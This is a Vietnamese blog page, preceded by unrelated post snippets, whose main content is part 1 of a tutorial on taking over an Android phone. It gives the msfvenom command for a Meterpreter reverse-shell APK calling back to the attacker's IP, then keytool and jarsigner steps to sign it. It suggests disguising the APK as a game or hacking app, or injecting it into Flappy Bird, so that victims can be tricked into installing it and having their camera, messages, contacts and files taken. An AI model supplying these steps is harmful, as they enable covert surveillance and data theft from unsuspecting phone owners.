Điều khiển điện thoại trên kali linux

What are we unit testing exactly ? We're using  "unit testing"  to refer to tests of functions and plain JavaScript objects, independent of the React Native framework. This means that we aren't testing any components that rely on React Native. For example, a unit could be individual methods and functions in classes or really any small pieces of functionality. We mock out dependencies in these tests so that we can test individual methods and functions in isolation. These test are written using testing frameworks and for this article i will be using  Jest , javascript testing framework together with  Enzyme  and  React Native Testing Library . Setting Install If you use  React Native CLI  installs the  Jest  testing framework by default. But if you're using Expo we need to install it manually. yarn add -D enzyme enzyme-adapter-react-16 More: yarn add react-dom react-native-testing-library Create new file  jestSetup.js  in root and add to j

Share

Read more

Hướng dẫn cài LibreOffice trên Kali Linux

January 06, 2017

Xin chào mọi người ! Một số bạn không biết cài bộ công cụ văn phòng nào cho máy tính cài HĐH Kali Linux. Hôm nay mình sẽ hướng dẫn cho các bạn cài  LibreOffice trên Kali Linux. Nó giống như bộ Office của Microsoft và trên thực tế thì không bằng Microsoft được đâu. Việc cài đặt bộ Office này khá là đơn giản. Đầu tiên để cài thì bạn hãy tải LibreOffice phù hợp với phiên bản của máy tính đang sử dụng. Như của mình hiện tại là phiên bản LibreOffice_5.2.4 + Link Download [Download] Hãy tải phiên bản mới nhất có đuôi *.deb cho dễ cài đặt. Sau khi tải xong có 2 cách để các bạn cài đặt nó: + Cách 1: Sử dụng phần mềm Gdebi để cài đặt các file *.deb một cách dễ dàng. Tuy nhiên rất hay bị lỗi và không cài đặt được. + Cách 2: [Nên theo cách này] 1- Giải nén file LibreOffice ra. 2- Mở Terminal ra gõ:   ~# cd Downloads Các bạn có thể dùng lệnh ls để biết chính xác tên thư mục của mình và copy paste cho chuẩn. Tiếp sau đó thì gõ:   ~# cd LibreOffice_5.2.4_Linux_x86_

Share

Read more

Cách vào Internet bằng Terminal trong Kali Linux

March 19, 2017

Xin chào tất cả mọi người ! Việc vào mạng bằng các công cụ phổ biến hiện nay như Google Chrome, FireFox, IE,... quá là bình con nhà bà thường. Hôm nay tôi xin hướng dẫn cho các bạn cách vào Internet bằng Terminal trong Kali Linux. Đối với các siêu cao thủ Terminal thì đây là một phương pháp hay. Để có thể vào mạng bằng Ter thì bạn phải cài đặt 2 gói sau: Đầu tiên là: ~# apt-get install w3m w3m-img Sau đó chọn " y " Tiếp theo là: ~# apt-get install xterm Chờ cho cài đặt xong là okey ! Như vậy là chúng ta đã cài đặt xong. Để có thể sử dụng các bạn gõ: ~# w3m [www.example.com] VD: ~#w3m google.com Sau khi gõ xong địa chỉ truy cập thì đây chính là giao diện của nó: Trông cũng nguy hiểm đấy chứ nhỉ :] Để sử dụng thì các bạn Click chuột vào ô tìm kiếm sẽ thấy bên dưới góc trái Ter chuyển từ Viewing sang TEXT . Chỉ cần gõ thứ cần tìm rồi ENTER. Sau đó con trỏ chuột sẽ chuyển từ "I" sang mũi tên và ta chỉ cần Click vào [Tìm v

Bài viết mang tính chất tham khảo, dành cho học tập, nghiên cứu và cho các bạn tìm tòi học hỏi. Chúng tôi không chịu trách nhiệm liên đới nếu các bạn áp dụng để phá hoại nhé..

Bạn đang phân vân về vấn đề điện thoại bị hack ?

Ban thắc mắc khi bị hack thì điện thoại của bạn sẽ như thế nào?

Biểu hiện của việc bạn đã bị xâm nhập là ra sao ?

Những thông tin cá nhân của bạn có còn an toàn hay không?

Hacker lấy được những gì từ điện thoại của bạn và dùng chúng để làm gì ?

Hoặc bạn đang muốn thử hack phát chơi :v :v

Mô tả tổng quan bài viết: 

Trong bài viết này, mình sẽ thử nghiệm việc hack thử một chiếc điện thoại, chụp ảnh trực tiếp từ điện thoại đó và gửi về máy tính của mình, đồng thời xem video từ camera của điện thoại đó trong thời gian thực. ngoài ra, còn có thể xem danh sách các file đang có trên bộ nhớ, thẻ nhớ của điện thoại đó, tải về nội dung tin nhắn, danh sách danh bạ…

Tại bài Viết này, chúng ta sẽ cùng nhau tìm hiểu những vấn đề trên, về một trong những cách mà hacker thường dùng để xâm nhập trái phép vào hệ thống của bạn, cách bạn bị lây nhiễm và các phương pháp phòng chống. Hy vọng sẽ giúp các bạn phần nào trong việc hiểu rõ các nguy cơ bị xâm nhập, các phương pháp phòng chống và bảo vệ mình trước những mối nguy hại tiềm tàng mà không phải ai cũng nhận thức được…

Vì nội dung của demo hơi dài nên mình sẽ chia ra làm 02 phần, nếu quan tâm bạn có thể theo dõi tiếp trong các bài viết tiếp theo của mình.

Phần 01 :  TẠO FILE APK CÀI ĐẶT VÀ CHỨNG CHỈ

Phần 02 : THỰC HÀNH : KHỞI TẠO MÔI TRƯỜNG VÀ TIẾN HÀNH TRẢI NGHIỆM

PHẦN 01 : THIẾT LẬP MÔI TRƯỜNG VÀ TẠO FILE *.APK

Các bước chuẩn bị trước khi bắt đầu :

  • Hệ điều hành kali linux, [có thể sử dụng máy thật hoặc cài trên máy ảo VMware để sử dụng đều được].
  • Một điện thoại sử dụng HĐH android.

Trước khi vào nội dung bài chính, bạn có thể tham khảo loạt bài viết bên dưới để hiểu rõ hơn về Hệ Điều Hành Kali và phương pháp cài đặt để sử dụng:

TỔNG QUAN VỀ KALI LINUXHƯỚNG DẪN CÀI ĐẶT MÁY ẢO VMWAREHƯỚNG DẪN CÀI ĐẶT KALI LINUX TRÊN MÁY ẢO VMWAREHƯỚNG DẪN CÀI ĐẶT VMWARE TOOLS TRÊN KALI

BẮT ĐẦU TIẾN HÀNH THÔI:

Video cho các bạn tham khảo:

Đầu tiên, các bạn cần Khởi động Kali linux, chi tiết về kali cũng như cách cài đặt máy ảo VMware, cài đặt KALI bạn có thể tham khảo các link ở đầu bài viết. :d

Bước 1: Xác định địa chỉ IP của Kali linux:

Lưu ý, nếu bạn đang chạy Kali trên máy ảo VMware thì cần đảm bảo rằng chế độ card mạng đang là Bridged [mục đích để kali nhận địa chỉ IP trực tiếp từ modem, Hình 1 ]

Thiết lập chế độ Bridged cho card mạng VMware

Hình 1

Để bắt đầu, bạn cần mở ứng dụng Terminal trên Kali. [hình 2]

Mở ứng dụng Terminal trên Kali

Hình 2

Sau đó nhập lệnh ifconfig để biết thông số IP đang nhận được [hình 3]

Tìm IP hệ thống

Hình 3

Sau khi đã đã đảm bảo IP trên kali và IP trên máy thật của bạn cùng thuộc một đường mạng, ở đây đường mạng của mình là [ 192.168.1.X ] chúng ta sẽ chuyển qua Bước 2

Bước 2: Tạo ứng dụng *.apk để cài đặt vào máy victim:

Cũng như trên windows, nếu muốn cài chương trình thì phải sử dụng file *.MSI hoặc file *.exe . File APK trên hệ điều hành Android được sử dụng để cài đặt phần mềm trên hệ thống này.

Nhập lệnh sau để tạo file *.apk, thay [My IP] bằng  địa chỉ IP của bạn, các bạn có thể đặt tên bất kỳ cho file này, trong bài viết này mình sẽ đặt tên cho nó là Hack_test.apk [Hình 3]

msfvenom -p android/meterpreter/reverse_tcp set host=[My IP] -o [Tên file apk].apk

Tạo file *.apk

Hình 3

Câu lệnh sẽ tạo ra 1 file Hack_test.apk ở trong Thư mục HOME

File được tạo ra trong thư mục HOME

Bước 3 : Tạo file chữ ký

Các ứng dụng trên Android luôn phải có chữ ký kỹ thuật số trước khi nó được phép triển khai cài đặt trên thiết bị. Không giống như một số nền tảng điện thoại di động khác, bạn không cần phải đi mua giấy chứng nhận kỹ thuật số từ cơ quan cấp chứng nhận [ CA ] để đăng ký các ứng dụng của bạn. Mà thay vào đó, bạn có thể tự tạo ra chứng chỉ tự ký của riêng bản thân và sử dụng nó để đăng ký các ứng dụng Android. Nếu như ko có chữ ký thì bạn hoàn toàn không thể cài đặt file apk trên thiết bị được.

a. Tiến hành tạo file chứng chỉ :

Chúng ta sử dụng cú pháp lệnh như sau để tạo file này:

keytool -genkeypair -v -keystore [Tên file chữ ký].keystore -alias [Tên alias] -keyalg RSA -keysize [option] -validity [option]

Ở đây mình đã thay thế các Option thành câu lệnh cụ thể : Hình 4

keytool -genkeypair -v -keystore my_key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Tạo file Chứng Chỉ

Hình 4

Màn hình nhập mật khẩu cho chứng chỉ. Bạn gõ vào bất kỳ mật khẩu nào có nhiều hơn 6 ký tự, rồi nhập thêm 1 lần nữa để xác nhận [Hình 5]

Tạo mật khẩu cho file Chứng Chỉ

Hình 5

Một dãy các câu hỏi được tạo ra, các bạn cứ nhấn enter để bỏ trống [hình 6]

Trả lời các câu hỏi

Hình 6

Tại bước xác nhận, bạn nhập Yes để đồng ý, sau đó nhập tiếp thêm 2 lần mật khẩu như trên để kết thúc  [hình 7]

Nhập lại mật khẩu cho file Chứng chỉ

Hình 7

b. Dùng file chứng chỉ để ký cho file apk

Sau khi đã tạo được file chứng chỉ, việc tiếp theo là kí cho file Hack_test.apk

Sử dụng lệnh với cú pháp như sau:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore [Tên file chữ ký] [tên file cần ký]  [tên alias]

Và mình chỉnh sửa lại nó thành [hình 8]

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my_key.keystore  Hack_test.apk  alias_name

Dùng file chứng chỉ để ký cho file apk

Hình 8

Nhập mật khẩu của file chứng chỉ [hình 9]

Nhập mật khẩu của file chứng chỉ để xác nhận

Hình 9

Vậy là chúng ta đã ký thành công cho file apk.

Sau khi ký xong, chúng ta đã có được 1 file apk hoàn chỉnh, việc tiêp theo sẽ là tìm cách cài đặt file này lên điện thoại cần hack.
Để thực hiện việc này có nhiều cách, ví dụ như như đổi tên file này thành tên của một ứng dụng game, hoặc tên một ứng dụng dùng để hack wifi, hack facebook… , hoặc cũng có thể dùng file apk này chèn thẳng vào 1 file apk khác, ví dụ như game flappy bird của Nguyễn Hà Đông chẳng hạn. Tuy đã bị gỡ khỏi googe Play nhưng game này vẫn luôn được người dùng tìm, tải về cài đặt.Và… flappy bird là game bị dính nhiều loại malware, virus, trojan, worm nhất hiện nay…. :]]

Tóm lại: 

Qua các bước trên, chúng ta đã tạo được 1 file apk và tiến hành cấp chứng chỉ tạo độ truest cho file này.

Ở bài viết tiếp theo, chúng ta sẽ tìm cách để cài đặt file này lên điện thoại cần hack . Ở đây, thay vì mua một Hostting để update file apk này lên đó, thì mình sẽ dùng kali linux như là một dịch vụ Web Server luôn và lưu trữ tập tin apk này lên đây để thử nghiệm hiệu quả của file này một khi đã xâm nhập được vào hệ thống người dùng,  Hy vọng sẽ được sự đón nhận của các bạn.

Bước tiếp theo, các bạn có thể theo dõi tại :

PHẦN 02 : KHỞI TẠO MÔI TRƯỜNG VÀ TIẾN HÀNH TRẢI NGHIỆM

Mọi chi tiết góp ý các bạn có thể để lại dưới phần comment.

CÓ THỂ BẠN QUAN TÂM:

Tạo Một Fake Virus Để Troll Bạn BèHƯỚNG DẪN ĐĂNG KÝ VÀ TẠO MÁY ẢO VPS AMAZON 2017 MIỄN PHÍ 12 THÁNG – PHẦN IHack Mật Khẩu Wifi Chuẩn WPA – WPA2

Để tôn trọng quyền tác giả cũng như góp phần làm trong sạch môi trường Internet. đề nghị các bạn ghi rõ nguồn tại Vienthongbuonho.net khi muốn sử dụng lại bài viết trên nhé. Chân thành cảm ơn…

Chủ Đề